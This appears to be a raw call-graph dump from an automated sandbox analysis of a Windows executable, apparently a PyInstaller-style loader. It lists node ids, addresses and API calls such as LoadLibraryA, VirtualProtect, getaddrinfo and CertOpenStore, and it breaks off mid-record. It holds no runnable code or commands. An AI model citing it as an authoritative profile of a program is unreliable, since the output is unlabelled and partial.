62614 7ffba4220f30 62613->62614 62621 7ffba4220368 62613->62621 62615 7ffba4220e53 LoadLibraryA 62616 7ffba4220e6d 62615->62616 62617 7ffba4220e76 GetProcAddress 62616->62617 62616->62621 62617->62616 62619 7ffba4220e97 62617->62619 62620 7ffba4220ea2 VirtualProtect VirtualProtect 62620->62614 62621->62615 62621->62620 62622 7ffbaa49746c 62624 7ffbaa49750e 62622->62624 62623 7ffbaa49778b 62624->62623 62626 7ffbaa49766d 62624->62626 62627 7ffbaa497645 getaddrinfo 62624->62627 62625 7ffbaa49780f FreeAddrInfoW 62625->62623 62626->62623 62626->62625 62631 7ffbaa497668 62627->62631 62629 7ffbaa497785 FreeAddrInfoW 62629->62623 62630 7ffbaa49774a 62630->62623 62630->62629 62631->62626 62631->62630 62632 7ffbaa494b80 10 API calls 62631->62632 62632->62631 62633 7ffba66aa1cc 62634 7ffba66aa1fb 62633->62634 62635 7ffba66aa21d 62634->62635 62637 7ffba66aa248 62634->62637 62639 7ffba66aa272 62637->62639 62638 7ffba66a44e4 2 API calls 62642 7ffba66aa32f 62638->62642 62639->62638 62640 7ffba66aa28a 62639->62640 62640->62635 62642->62640 62643 7ffba66a44e4 2 API calls 62642->62643 62644 7ffba66a4c3c WSAGetLastError 62642->62644 62643->62642 62644->62642 62645 7ffba66a2150 62646 7ffba66a216f 62645->62646 62647 7ffba66a223d 62646->62647 62649 7ffba66a2260 62646->62649 62650 7ffba66a2286 62649->62650 62651 7ffba66a3b6a 62650->62651 62654 7ffba66a22c8 IsProcessorFeaturePresent 62650->62654 62653 7ffba66a22a6 62653->62647 62654->62653 62655 7ffba66aa790 62656 7ffba66aa7a3 62655->62656 62656->62656 62657 7ffba66aa802 62656->62657 62659 7ffba66aa874 00007FFBAA67CA38 62656->62659 62660 7ffba66aa8aa 62659->62660 62665 7ffba66aa8dc 62659->62665 62672 7ffba66accdc CertOpenStore 62660->62672 62662 7ffba66aa8ba 62663 7ffba66aa8ce GetLastError 62662->62663 62662->62665 62663->62665 62664 7ffba66aa9ac CertEnumCertificatesInStore 62669 7ffba66aa9c1 62664->62669 62671 7ffba66aa8b2 62664->62671 62665->62657 62666 7ffba66aaabc CertCloseStore 62666->62662 62666->62665 62667 7ffba66ac2ac CertGetEnhancedKeyUsage CertGetEnhancedKeyUsage GetLastError 62667->62671 62668 7ffba66aaa4d CertFreeCertificateContext 62668->62669 62669->62666 62670 7ffba66aa9c6 62670->62668 62671->62662 62671->62664 62671->62667 62671->62670 62673 7ffba66acd19 62672->62673 62674 7ffba66acd15 62672->62674 62675 7ffba66acd1d CertOpenStore 62673->62675 62677 7ffba66acd7f 62673->62677 62674->62671 62675->62673 62676 7ffba66acd48 CertAddStoreToCollection CertCloseStore 62675->62676 62676->62673 62677->62674 62678 7ffba66acd84 CertCloseStore 62677->62678 62678->62674 62679 7ff72c65cc3c 62700 7ff72c65ce0c 62679->62700 62682 7ff72c65cd88 62851 7ff72c65d12c 7 API calls 2 library calls 62682->62851 62683 7ff72c65cc58 __scrt_acquire_startup_lock 62685 7ff72c65cd92 62683->62685 62686 7ff72c65cc76 __scrt_release_startup_lock 62683->62686 62852 7ff72c65d12c 7 API calls 2 library calls 62685->62852 62689 7ff72c65cc9b 62686->62689 62690 7ff72c65cd21 62686->62690 62848 7ff72c669b2c 45 API calls 62686->62848 62688 7ff72c65cd9d __FrameHandler3::FrameUnwindToEmptyState 62706 7ff72c65d274 62690->62706 62692 7ff72c65cd26 62709 7ff72c651000 62692->62709 62697 7ff72c65cd49 62697->62688 62850 7ff72c65cf90 7 API calls 62697->62850 62699 7ff72c65cd60 62699->62689 62701 7ff72c65ce14 62700->62701 62702 7ff72c65ce20 __scrt_dllmain_crt_thread_attach 62701->62702 62703 7ff72c65ce2d 62702->62703 62705 7ff72c65cc50 62702->62705 62703->62705 62853 7ff72c65d888 7 API calls 2 library calls 62703->62853 62705->62682 62705->62683 62854 7ff72c67a4d0 62706->62854 62708 7ff72c65d28b GetStartupInfoW 62708->62692 62710 7ff72c651009 62709->62710 62856 7ff72c665484 62710->62856 62712 7ff72c6537fb 62863 7ff72c6536b0 62712->62863 62718 7ff72c65391b 62967 7ff72c6545c0 62718->62967 62719 7ff72c65383c 62962 7ff72c651c80 62719->62962 62723 7ff72c65385b 62935 7ff72c658830 62723->62935 62726 7ff72c65396a 62990 7ff72c652710 54 API calls _log10_special 62726->62990 62728 7ff72c65388e 62737 7ff72c6538bb __std_exception_copy 62728->62737 62966 7ff72c6589a0 40 API calls __std_exception_copy 62728->62966 62730 7ff72c65395d 62731 7ff72c653984 62730->62731 62732 7ff72c653962 62730->62732 62733 7ff72c651c80 49 API calls 62731->62733 62986 7ff72c66004c 62732->62986 62736 7ff72c6539a3 62733->62736 62742 7ff72c651950 115 API calls 62736->62742 62739 7ff72c658830 14 API calls 62737->62739 62745 7ff72c6538de __std_exception_copy 62737->62745 62739->62745 62740 7ff72c653a0b 62993 7ff72c6589a0 40 API calls __std_exception_copy 62740->62993 62744 7ff72c6539ce 62742->62744 62743 7ff72c653a17 62994 7ff72c6589a0 40 API calls __std_exception_copy 62743->62994 62744->62723 62747 7ff72c6539de 62744->62747 62751 7ff72c65390e __std_exception_copy 62745->62751 62992 7ff72c658940 40 API calls __std_exception_copy 62745->62992 62991 7ff72c652710 54 API calls _log10_special 62747->62991 62748 7ff72c653a23 62995 7ff72c6589a0 40 API calls __std_exception_copy 62748->62995 62752 7ff72c658830 14 API calls 62751->62752 62753 7ff72c653a3b 62752->62753 62754 7ff72c653a60 __std_exception_copy 62753->62754 62755 7ff72c653b2f 62753->62755 62769 7ff72c653aab 62754->62769 62996 7ff72c658940 40 API calls __std_exception_copy 62754->62996 62997 7ff72c652710 54 API calls _log10_special 62755->62997 62757 7ff72c653808 __std_exception_copy 63000 7ff72c65c550 62757->63000 62759 7ff72c658830 14 API calls 62760 7ff72c653bf4 __std_exception_copy 62759->62760 62761 7ff72c653c46 62760->62761 62762 7ff72c653d41 62760->62762 62764 7ff72c653cd4 62761->62764 62765 7ff72c653c50 62761->62765 63011 7ff72c6544e0 49 API calls 62762->63011 62767 7ff72c658830 14 API calls 62764->62767 62998 7ff72c6590e0 59 API calls _log10_special 62765->62998 62771 7ff72c653ce0 62767->62771 62768 7ff72c653d4f 62772 7ff72c653d65 62768->62772 62773 7ff72c653d71 62768->62773 62769->62759 62770 7ff72c653c55 62774 7ff72c653cb3 62770->62774 62775 7ff72c653c61 62770->62775 62771->62775 62778 7ff72c653ced 62771->62778 63012 7ff72c654630 62772->63012 62777 7ff72c651c80 49 API calls 62773->62777 63009 7ff72c658660 86 API calls 2 library calls 62774->63009 62999 7ff72c652710 54 API calls _log10_special 62775->62999 62788 7ff72c653d2b __std_exception_copy 62777->62788 62781 7ff72c651c80 49 API calls 62778->62781 62784 7ff72c653d0b 62781->62784 62782 7ff72c653dc4 62948 7ff72c659390 62782->62948 62783 7ff72c653cbb 62786 7ff72c653cc8 62783->62786 62787 7ff72c653cbf 62783->62787 62784->62788 62789 7ff72c653d12 62784->62789 62786->62788 62787->62775 62788->62782 62790 7ff72c653da7 SetDllDirectoryW LoadLibraryExW 62788->62790 63010 7ff72c652710 54 API calls _log10_special 62789->63010 62790->62782 62791 7ff72c653dd7 SetDllDirectoryW 62794 7ff72c653e0a 62791->62794 62838 7ff72c653e5a 62791->62838 62795 7ff72c658830 14 API calls 62794->62795 62807 7ff72c653e16 __std_exception_copy 62795->62807 62796 7ff72c654008 62797 7ff72c654012 PostMessageW GetMessageW 62796->62797 62801 7ff72c654035 62796->62801 62797->62801 62798 7ff72c653f1b 63023 7ff72c6533c0 121 API calls 2 library calls 62798->63023 62800 7ff72c653f23 62800->62757 62802 7ff72c653f2b 62800->62802 62953 7ff72c653360 62801->62953 63024 7ff72c6590c0 LocalFree 62802->63024 62806 7ff72c653ef2 63022 7ff72c658940 40 API calls __std_exception_copy 62806->63022 62807->62806 62811 7ff72c653e4e 62807->62811 62811->62838 63015 7ff72c656dc0 54 API calls _get_daylight 62811->63015 62814 7ff72c65404f 63026 7ff72c656fc0 FreeLibrary 62814->63026 62819 7ff72c65405b 62820 7ff72c653e6c 63016 7ff72c657340 117 API calls 2 library calls 62820->63016 62824 7ff72c653e81 62827 7ff72c653ea2 62824->62827 62839 7ff72c653e85 62824->62839 63017 7ff72c656e00 120 API calls _log10_special 62824->63017 62827->62839 63018 7ff72c6571b0 125 API calls 62827->63018 62831 7ff72c653ee0 63021 7ff72c656fc0 FreeLibrary 62831->63021 62832 7ff72c653eb7 62832->62839 63019 7ff72c6574f0 55 API calls 62832->63019 62838->62796 62838->62798 62839->62838 63020 7ff72c652a50 54 API calls _log10_special 62839->63020 62848->62690 62849 7ff72c65d2b8 GetModuleHandleW 62849->62697 62850->62699 62851->62685 62852->62688 62853->62705 62855 7ff72c67a4c0 62854->62855 62855->62708 62855->62855 62858 7ff72c66f480 62856->62858 62859 7ff72c66f526 62858->62859 62860 7ff72c66f4d3 62858->62860 63028 7ff72c66f358 71 API calls _fread_nolock 62859->63028 63027 7ff72c66a814 37 API calls 2 library calls 62860->63027 62862 7ff72c66f4fc 62862->62712 63029 7ff72c65c850 62863->63029 62866 7ff72c6536eb GetLastError 63036 7ff72c652c50 51 API calls _log10_special 62866->63036 62867 7ff72c653710 63031 7ff72c659280 FindFirstFileExW 62867->63031 62871 7ff72c653706 62875 7ff72c65c550 _log10_special 8 API calls 62871->62875 62872 7ff72c65377d 63039 7ff72c659440 WideCharToMultiByte WideCharToMultiByte __std_exception_copy 62872->63039 62873 7ff72c653723 63037 7ff72c659300 CreateFileW GetFinalPathNameByHandleW CloseHandle 62873->63037 62878 7ff72c6537b5 62875->62878 62877 7ff72c653730 62880 7ff72c65374c __vcrt_InitializeCriticalSectionEx 62877->62880 62881 7ff72c653734 62877->62881 62878->62757 62885 7ff72c651950 62878->62885 62879 7ff72c65378b 62879->62871 63040 7ff72c652810 49 API calls _log10_special 62879->63040 62880->62872 63038 7ff72c652810 49 API calls _log10_special 62881->63038 62884 7ff72c653745 62884->62871 62886 7ff72c6545c0 108 API calls 62885->62886 62887 7ff72c651985 62886->62887 62888 7ff72c651c43 62887->62888 62889 7ff72c657f90 83 API calls 62887->62889 62890 7ff72c65c550 _log10_special 8 API calls 62888->62890 62891 7ff72c6519cb 62889->62891 62892 7ff72c651c5e 62890->62892 62934 7ff72c651a03 62891->62934 63041 7ff72c6606d4 62891->63041 62892->62718 62892->62719 62894 7ff72c66004c 74 API calls 62894->62888 62895 7ff72c6519e5 62896 7ff72c651a08 62895->62896 62897 7ff72c6519e9 62895->62897 63045 7ff72c66039c 62896->63045 63048 7ff72c664f08 11 API calls _get_daylight 62897->63048 62901 7ff72c6519ee 63049 7ff72c652910 54 API calls _log10_special 62901->63049 62902 7ff72c651a45 62908 7ff72c651a7b 62902->62908 62909 7ff72c651a5c 62902->62909 62903 7ff72c651a26 63050 7ff72c664f08 11 API calls _get_daylight 62903->63050 62906 7ff72c651a2b 63051 7ff72c652910 54 API calls _log10_special 62906->63051 62910 7ff72c651c80 49 API calls 62908->62910 63052 7ff72c664f08 11 API calls _get_daylight 62909->63052 62912 7ff72c651a92 62910->62912 62914 7ff72c651c80 49 API calls 62912->62914 62913 7ff72c651a61 63053 7ff72c652910 54 API calls _log10_special 62913->63053 62916 7ff72c651add 62914->62916 62917 7ff72c6606d4 73 API calls 62916->62917 62918 7ff72c651b01 62917->62918 62919 7ff72c651b35 62918->62919 62920 7ff72c651b16 62918->62920 62922 7ff72c66039c _fread_nolock 53 API calls 62919->62922 63054 7ff72c664f08 11 API calls _get_daylight 62920->63054 62924 7ff72c651b4a 62922->62924 62923 7ff72c651b1b 63055 7ff72c652910 54 API calls _log10_special 62923->63055 62925 7ff72c651b6f 62924->62925 62926 7ff72c651b50 62924->62926 63058 7ff72c660110 37 API calls 2 library calls 62925->63058 63056 7ff72c664f08 11 API calls _get_daylight 62926->63056 62930 7ff72c651b55 63057 7ff72c652910 54 API calls _log10_special 62930->63057 62931 7ff72c651b89 62931->62934 63059 7ff72c652710 54 API calls _log10_special 62931->63059 62934->62894 62936 7ff72c65883a 62935->62936 62937 7ff72c659390 2 API calls 62936->62937 62938 7ff72c658859 GetEnvironmentVariableW 62937->62938 62939 7ff72c658876 ExpandEnvironmentStringsW 62938->62939 62940 7ff72c6588c2 62938->62940 62939->62940 62941 7ff72c658898 62939->62941 62942 7ff72c65c550 _log10_special 8 API calls 62940->62942 63089 7ff72c659440 WideCharToMultiByte WideCharToMultiByte __std_exception_copy 62941->63089 62944 7ff72c6588d4 62942->62944 62944->62728 62945 7ff72c6588aa 62946 7ff72c65c550 _log10_special 8 API calls 62945->62946 62947 7ff72c6588ba 62946->62947 62947->62728 62949 7ff72c6593b2 MultiByteToWideChar 62948->62949 62950 7ff72c6593d6 62948->62950 62949->62950 62952 7ff72c6593ec __std_exception_copy 62949->62952 62951 7ff72c6593f3 MultiByteToWideChar 62950->62951 62950->62952 62951->62952 62952->62791 63090 7ff72c656360 62953->63090 62957 7ff72c653381 62961 7ff72c653399 62957->62961 63158 7ff72c656050 62957->63158 62959 7ff72c65338d 62959->62961 63167 7ff72c6561e0 54 API calls 62959->63167 63025 7ff72c653670 FreeLibrary 62961->63025 62963 7ff72c651ca5 62962->62963 63306 7ff72c664984 62963->63306 62966->62737 62968 7ff72c6545cc 62967->62968 62969 7ff72c659390 2 API calls 62968->62969 62970 7ff72c6545f4 62969->62970 62971 7ff72c659390 2 API calls 62970->62971 62972 7ff72c654607 62971->62972 63329 7ff72c665f94 62972->63329 62975 7ff72c65c550 _log10_special 8 API calls 62976 7ff72c65392b 62975->62976 62976->62726 62977 7ff72c657f90 62976->62977 62978 7ff72c657fb4 62977->62978 62979 7ff72c65808b __std_exception_copy 62978->62979 62980 7ff72c6606d4 73 API calls 62978->62980 62979->62730 62981 7ff72c657fd0 62980->62981 62981->62979 63497 7ff72c6678c8 62981->63497 62983 7ff72c657fe5 62983->62979 62984 7ff72c6606d4 73 API calls 62983->62984 62985 7ff72c66039c _fread_nolock 53 API calls 62983->62985 62984->62983 62985->62983 62987 7ff72c66007c 62986->62987 63513 7ff72c65fe28 62987->63513 62989 7ff72c660095 62989->62726 62990->62757 62991->62757 62992->62740 62993->62743 62994->62748 62995->62751 62996->62769 62997->62757 62998->62770 62999->62757 63001 7ff72c65c559 63000->63001 63002 7ff72c653ca7 63001->63002 63003 7ff72c65c8e0 IsProcessorFeaturePresent 63001->63003 63002->62849 63004 7ff72c65c8f8 63003->63004 63525 7ff72c65cad8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 63004->63525 63006 7ff72c65c90b 63526 7ff72c65c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 63006->63526 63009->62783 63010->62757 63011->62768 63013 7ff72c651c80 49 API calls 63012->63013 63014 7ff72c654660 63013->63014 63014->62788 63015->62820 63016->62824 63017->62827 63018->62832 63019->62839 63020->62831 63021->62838 63022->62838 63023->62800 63025->62814 63026->62819 63027->62862 63028->62862 63030 7ff72c6536bc GetModuleFileNameW 63029->63030 63030->62866 63030->62867 63032 7ff72c6592bf FindClose 63031->63032 63033 7ff72c6592d2 63031->63033 63032->63033 63034 7ff72c65c550 _log10_special 8 API calls 63033->63034 63035 7ff72c65371a 63034->63035 63035->62872 63035->62873 63036->62871 63037->62877 63038->62884 63039->62879 63040->62871 63042 7ff72c660704 63041->63042 63060 7ff72c660464 63042->63060 63044 7ff72c66071d 63044->62895 63073 7ff72c6603bc 63045->63073 63048->62901 63049->62934 63050->62906 63051->62934 63052->62913 63053->62934 63054->62923 63055->62934 63056->62930 63057->62934 63058->62931 63059->62934 63061 7ff72c6604ce 63060->63061 63062 7ff72c66048e 63060->63062 63061->63062 63064 7ff72c6604da 63061->63064 63072 7ff72c66a814 37 API calls 2 library calls 63062->63072 63071 7ff72c66546c EnterCriticalSection 63064->63071 63066 7ff72c6604b5 63066->63044 63067 7ff72c6604df 63068 7ff72c6605e8 71 API calls 63067->63068 63069 7ff72c6604f1 63068->63069 63070 7ff72c665478 _fread_nolock LeaveCriticalSection 63069->63070 63070->63066 63072->63066 63074 7ff72c6603e6 63073->63074 63085 7ff72c651a20 63073->63085 63075 7ff72c6603f5 __scrt_get_show_window_mode 63074->63075 63076 7ff72c660432 63074->63076 63074->63085 63087 7ff72c664f08 11 API calls _get_daylight 63075->63087 63086 7ff72c66546c EnterCriticalSection 63076->63086 63079 7ff72c66043a 63081 7ff72c66013c _fread_nolock 51 API calls 63079->63081 63080 7ff72c66040a 63088 7ff72c66a8e0 37 API calls _invalid_parameter_noinfo 63080->63088 63083 7ff72c660451 63081->63083 63084 7ff72c665478 _fread_nolock LeaveCriticalSection 63083->63084 63084->63085 63085->62902 63085->62903 63087->63080 63088->63085 63089->62945 63091 7ff72c656375 63090->63091 63092 7ff72c651c80 49 API calls 63091->63092 63093 7ff72c6563b1 63092->63093 63094 7ff72c6563dd 63093->63094 63095 7ff72c6563ba 63093->63095 63097 7ff72c654630 49 API calls 63094->63097 63178 7ff72c652710 54 API calls _log10_special 63095->63178 63098 7ff72c6563f5 63097->63098 63099 7ff72c656413 63098->63099 63179 7ff72c652710 54 API calls _log10_special 63098->63179 63168 7ff72c654560 63099->63168 63100 7ff72c65c550 _log10_special 8 API calls 63103 7ff72c65336e 63100->63103 63103->62961 63121 7ff72c656500 63103->63121 63105 7ff72c65642b 63106 7ff72c654630 49 API calls 63105->63106 63108 7ff72c656444 63106->63108 63107 7ff72c658e80 3 API calls 63107->63105 63109 7ff72c656469 63108->63109 63110 7ff72c656449 63108->63110 63174 7ff72c658e80 63109->63174 63180 7ff72c652710 54 API calls _log10_special 63110->63180 63113 7ff72c6563d3 63113->63100 63114 7ff72c656476 63115 7ff72c6564c1 63114->63115 63116 7ff72c656482 63114->63116 63182 7ff72c655830 137 API calls 63115->63182 63117 7ff72c659390 2 API calls 63116->63117 63119 7ff72c65649a GetLastError 63117->63119 63181 7ff72c652c50 51 API calls _log10_special 63119->63181 63183 7ff72c655400 63121->63183 63123 7ff72c656526 63124 7ff72c65652e 63123->63124 63125 7ff72c65653f 63123->63125 63208 7ff72c652710 54 API calls _log10_special 63124->63208 63190 7ff72c654c90 63125->63190 63129 7ff72c65654b 63209 7ff72c652710 54 API calls _log10_special 63129->63209 63130 7ff72c65655c 63133 7ff72c65656c 63130->63133 63135 7ff72c65657d 63130->63135 63132 7ff72c65653a 63132->62957 63210 7ff72c652710 54 API calls _log10_special 63133->63210 63136 7ff72c65659c 63135->63136 63137 7ff72c6565ad 63135->63137 63211 7ff72c652710 54 API calls _log10_special 63136->63211 63139 7ff72c6565bc 63137->63139 63140 7ff72c6565cd 63137->63140 63212 7ff72c652710 54 API calls _log10_special 63139->63212 63194 7ff72c654d50 63140->63194 63144 7ff72c6565dc 63213 7ff72c652710 54 API calls _log10_special 63144->63213 63145 7ff72c6565ed 63147 7ff72c6565fc 63145->63147 63148 7ff72c65660d 63145->63148 63214 7ff72c652710 54 API calls _log10_special 63147->63214 63150 7ff72c65661f 63148->63150 63152 7ff72c656630 63148->63152 63215 7ff72c652710 54 API calls _log10_special 63150->63215 63155 7ff72c65665a 63152->63155 63216 7ff72c6672b0 73 API calls 63152->63216 63154 7ff72c656648 63217 7ff72c6672b0 73 API calls 63154->63217 63155->63132 63218 7ff72c652710 54 API calls _log10_special 63155->63218 63159 7ff72c656070 63158->63159 63159->63159 63160 7ff72c656099 63159->63160 63166 7ff72c6560b0 __std_exception_copy 63159->63166 63250 7ff72c652710 54 API calls _log10_special 63160->63250 63162 7ff72c6560a5 63162->62959 63163 7ff72c6561bb 63163->62959 63165 7ff72c652710 54 API calls 63165->63166 63166->63163 63166->63165 63220 7ff72c651470 63166->63220 63167->62961 63169 7ff72c65456a 63168->63169 63170 7ff72c659390 2 API calls 63169->63170 63171 7ff72c65458f 63170->63171 63172 7ff72c65c550 _log10_special 8 API calls 63171->63172 63173 7ff72c6545b7 63172->63173 63173->63105 63173->63107 63175 7ff72c659390 2 API calls 63174->63175 63176 7ff72c658e94 LoadLibraryExW 63175->63176 63177 7ff72c658eb3 __std_exception_copy 63176->63177 63177->63114 63178->63113 63179->63099 63180->63113 63181->63113 63182->63113 63185 7ff72c65542c 63183->63185 63184 7ff72c655434 63184->63123 63185->63184 63188 7ff72c6555d4 63185->63188 63219 7ff72c666aa4 48 API calls 63185->63219 63186 7ff72c655797 __std_exception_copy 63186->63123 63187 7ff72c6547d0 47 API calls 63187->63188 63188->63186 63188->63187 63191 7ff72c654cc0 63190->63191 63192 7ff72c65c550 _log10_special 8 API calls 63191->63192 63193 7ff72c654d2a 63192->63193 63193->63129 63193->63130 63195 7ff72c654d65 63194->63195 63196 7ff72c651c80 49 API calls 63195->63196 63197 7ff72c654db1 63196->63197 63198 7ff72c654e33 __std_exception_copy 63197->63198 63199 7ff72c651c80 49 API calls 63197->63199 63200 7ff72c65c550 _log10_special 8 API calls 63198->63200 63201 7ff72c654df0 63199->63201 63202 7ff72c654e7e 63200->63202 63201->63198 63203 7ff72c659390 2 API calls 63201->63203 63202->63144 63202->63145 63204 7ff72c654e06 63203->63204 63205 7ff72c659390 2 API calls 63204->63205 63206 7ff72c654e1d 63205->63206 63207 7ff72c659390 2 API calls 63206->63207 63207->63198 63208->63132 63209->63132 63210->63132 63211->63132 63212->63132 63213->63132 63214->63132 63215->63132 63216->63154 63217->63155 63218->63132 63219->63185 63221 7ff72c6545c0 108 API calls 63220->63221 63222 7ff72c651493 63221->63222 63223 7ff72c65149b 63222->63223 63224 7ff72c6514bc 63222->63224 63273 7ff72c652710 54 API calls _log10_special 63223->63273 63225 7ff72c6606d4 73 API calls 63224->63225 63228 7ff72c6514d1 63225->63228 63227 7ff72c6514ab 63227->63166 63229 7ff72c6514f8 63228->63229 63230 7ff72c6514d5 63228->63230 63234 7ff72c651508 63229->63234 63235 7ff72c651532 63229->63235 63274 7ff72c664f08 11 API calls _get_daylight 63230->63274 63232 7ff72c6514da 63275 7ff72c652910 54 API calls _log10_special 63232->63275 63276 7ff72c664f08 11 API calls _get_daylight 63234->63276 63236 7ff72c651538 63235->63236 63245 7ff72c65154b 63235->63245 63251 7ff72c651210 63236->63251 63239 7ff72c651510 63277 7ff72c652910 54 API calls _log10_special 63239->63277 63240 7ff72c66004c 74 API calls 63243 7ff72c6515c4 63240->63243 63241 7ff72c6514f3 __std_exception_copy 63241->63240 63243->63166 63244 7ff72c66039c _fread_nolock 53 API calls 63244->63245 63245->63241 63245->63244 63246 7ff72c6515d6 63245->63246 63278 7ff72c664f08 11 API calls _get_daylight 63246->63278 63248 7ff72c6515db 63279 7ff72c652910 54 API calls _log10_special 63248->63279 63250->63162 63252 7ff72c651268 63251->63252 63253 7ff72c651297 63252->63253 63254 7ff72c65126f 63252->63254 63257 7ff72c6512d4 63253->63257 63258 7ff72c6512b1 63253->63258 63284 7ff72c652710 54 API calls _log10_special 63254->63284 63256 7ff72c651282 63256->63241 63262 7ff72c6512e6 63257->63262 63271 7ff72c651309 memcpy_s 63257->63271 63285 7ff72c664f08 11 API calls _get_daylight 63258->63285 63260 7ff72c6512b6 63286 7ff72c652910 54 API calls _log10_special 63260->63286 63287 7ff72c664f08 11 API calls _get_daylight 63262->63287 63264 7ff72c6512eb 63288 7ff72c652910 54 API calls _log10_special 63264->63288 63265 7ff72c66039c _fread_nolock 53 API calls 63265->63271 63267 7ff72c6512cf __std_exception_copy 63267->63241 63268 7ff72c6513cf 63289 7ff72c652710 54 API calls _log10_special 63268->63289 63271->63265 63271->63267 63271->63268 63272 7ff72c660110 37 API calls 63271->63272 63280 7ff72c660adc 63271->63280 63272->63271 63273->63227 63274->63232 63275->63241 63276->63239 63277->63241 63278->63248 63279->63241 63281 7ff72c660b0c 63280->63281 63290 7ff72c66082c 63281->63290 63283 7ff72c660b2a 63283->63271 63284->63256 63285->63260 63286->63267 63287->63264 63288->63267 63289->63267 63291 7ff72c66084c 63290->63291 63292 7ff72c660879 63290->63292 63291->63292 63293 7ff72c660856 63291->63293 63294 7ff72c660881 63291->63294 63292->63283 63304 7ff72c66a814 37 API calls 2 library calls 63293->63304 63297 7ff72c66076c 63294->63297 63305 7ff72c66546c EnterCriticalSection 63297->63305 63299 7ff72c660789 63300 7ff72c6607ac 74 API calls 63299->63300 63301 7ff72c660792 63300->63301 63302 7ff72c665478 _fread_nolock LeaveCriticalSection 63301->63302 63303 7ff72c66079d 63302->63303 63303->63292 63304->63292 63308 7ff72c6649de 63306->63308 63307 7ff72c664a03 63324 7ff72c66a814 37 API calls 2 library calls 63307->63324 63308->63307 63310 7ff72c664a3f 63308->63310 63325 7ff72c662c10 49 API calls _invalid_parameter_noinfo 63310->63325 63312 7ff72c664b1c 63328 7ff72c66a948 11 API calls 2 library calls 63312->63328 63314 7ff72c65c550 _log10_special 8 API calls 63316 7ff72c651cc8 63314->63316 63315 7ff72c664ad6 63315->63312 63317 7ff72c664b40 63315->63317 63318 7ff72c664af1 63315->63318 63319 7ff72c664ae8 63315->63319 63316->62723 63317->63312 63320 7ff72c664b4a 63317->63320 63326 7ff72c66a948 11 API calls 2 library calls 63318->63326 63319->63312 63319->63318 63327 7ff72c66a948 11 API calls 2 library calls 63320->63327 63323 7ff72c664a2d 63323->63314 63324->63323 63325->63315 63326->63323 63327->63323 63328->63323 63330 7ff72c665ec8 63329->63330 63331 7ff72c665eee 63330->63331 63334 7ff72c665f21 63330->63334 63360 7ff72c664f08 11 API calls _get_daylight 63331->63360 63333 7ff72c665ef3 63361 7ff72c66a8e0 37 API calls _invalid_parameter_noinfo 63333->63361 63336 7ff72c665f27 63334->63336 63337 7ff72c665f34 63334->63337 63362 7ff72c664f08 11 API calls _get_daylight 63336->63362 63348 7ff72c66ac28 63337->63348 63340 7ff72c654616 63340->62975 63342 7ff72c665f48 63363 7ff72c664f08 11 API calls _get_daylight 63342->63363 63343 7ff72c665f55 63355 7ff72c66fecc 63343->63355 63346 7ff72c665f68 63364 7ff72c665478 LeaveCriticalSection 63346->63364 63365 7ff72c6702d8 EnterCriticalSection 63348->63365 63350 7ff72c66ac3f 63351 7ff72c66ac9c 19 API calls 63350->63351 63352 7ff72c66ac4a 63351->63352 63353 7ff72c670338 _isindst LeaveCriticalSection 63352->63353 63354 7ff72c665f3e 63353->63354 63354->63342 63354->63343 63366 7ff72c66fbc8 63355->63366 63358 7ff72c66ff26 63358->63346 63360->63333 63361->63340 63362->63340 63363->63340 63372 7ff72c66fc03 __vcrt_InitializeCriticalSectionEx 63366->63372 63367 7ff72c66fdca 63371 7ff72c66fdd3 63367->63371 63384 7ff72c664f08 11 API calls _get_daylight 63367->63384 63369 7ff72c66fea1 63385 7ff72c66a8e0 37 API calls _invalid_parameter_noinfo 63369->63385 63371->63358 63378 7ff72c676d54 63371->63378 63372->63367 63381 7ff72c667a3c 51 API calls 3 library calls 63372->63381 63374 7ff72c66fe35 63374->63367 63382 7ff72c667a3c 51 API calls 3 library calls 63374->63382 63376 7ff72c66fe54 63376->63367 63383 7ff72c667a3c 51 API calls 3 library calls 63376->63383 63386 7ff72c676354 63378->63386 63381->63374 63382->63376 63383->63367 63384->63369 63385->63371 63387 7ff72c67636b 63386->63387 63388 7ff72c676389 63386->63388 63440 7ff72c664f08 11 API calls _get_daylight 63387->63440 63388->63387 63390 7ff72c6763a5 63388->63390 63397 7ff72c676964 63390->63397 63391 7ff72c676370 63441 7ff72c66a8e0 37 API calls _invalid_parameter_noinfo 63391->63441 63395 7ff72c67637c 63395->63358 63443 7ff72c676698 63397->63443 63400 7ff72c6769d9 63475 7ff72c664ee8 11 API calls _get_daylight 63400->63475 63401 7ff72c6769f1 63463 7ff72c668520 63401->63463 63404 7ff72c6769de 63476 7ff72c664f08 11 API calls _get_daylight 63404->63476 63432 7ff72c6763d0 63432->63395 63442 7ff72c6684f8 LeaveCriticalSection 63432->63442 63440->63391 63441->63395 63444 7ff72c6766c4 63443->63444 63452 7ff72c6766de 63443->63452 63444->63452 63488 7ff72c664f08 11 API calls _get_daylight 63444->63488 63446 7ff72c6766d3 63489 7ff72c66a8e0 37 API calls _invalid_parameter_noinfo 63446->63489 63448 7ff72c6767ad 63450 7ff72c67680a 63448->63450 63494 7ff72c669b78 37 API calls 2 library calls 63448->63494 63449 7ff72c67675c 63449->63448 63492 7ff72c664f08 11 API calls _get_daylight 63449->63492 63450->63400 63450->63401 63452->63449 63490 7ff72c664f08 11 API calls _get_daylight 63452->63490 63454 7ff72c676806 63454->63450 63457 7ff72c676888 63454->63457 63456 7ff72c6767a2 63493 7ff72c66a8e0 37 API calls _invalid_parameter_noinfo 63456->63493 63495 7ff72c66a900 17 API calls _isindst 63457->63495 63458 7ff72c676751 63491 7ff72c66a8e0 37 API calls _invalid_parameter_noinfo 63458->63491 63496 7ff72c6702d8 EnterCriticalSection 63463->63496 63475->63404 63476->63432 63488->63446 63489->63452 63490->63458 63491->63449 63492->63456 63493->63448 63494->63454 63498 7ff72c6678f8 63497->63498 63501 7ff72c6673d4 63498->63501 63500 7ff72c667911 63500->62983 63502 7ff72c66741e 63501->63502 63503 7ff72c6673ef 63501->63503 63511 7ff72c66546c EnterCriticalSection 63502->63511 63512 7ff72c66a814 37 API calls 2 library calls 63503->63512 63506 7ff72c66740f 63506->63500 63507 7ff72c667423 63508 7ff72c667440 38 API calls 63507->63508 63509 7ff72c66742f 63508->63509 63510 7ff72c665478 _fread_nolock LeaveCriticalSection 63509->63510 63510->63506 63512->63506 63514 7ff72c65fe43 63513->63514 63515 7ff72c65fe71 63513->63515 63524 7ff72c66a814 37 API calls 2 library calls 63514->63524 63522 7ff72c65fe63 63515->63522 63523 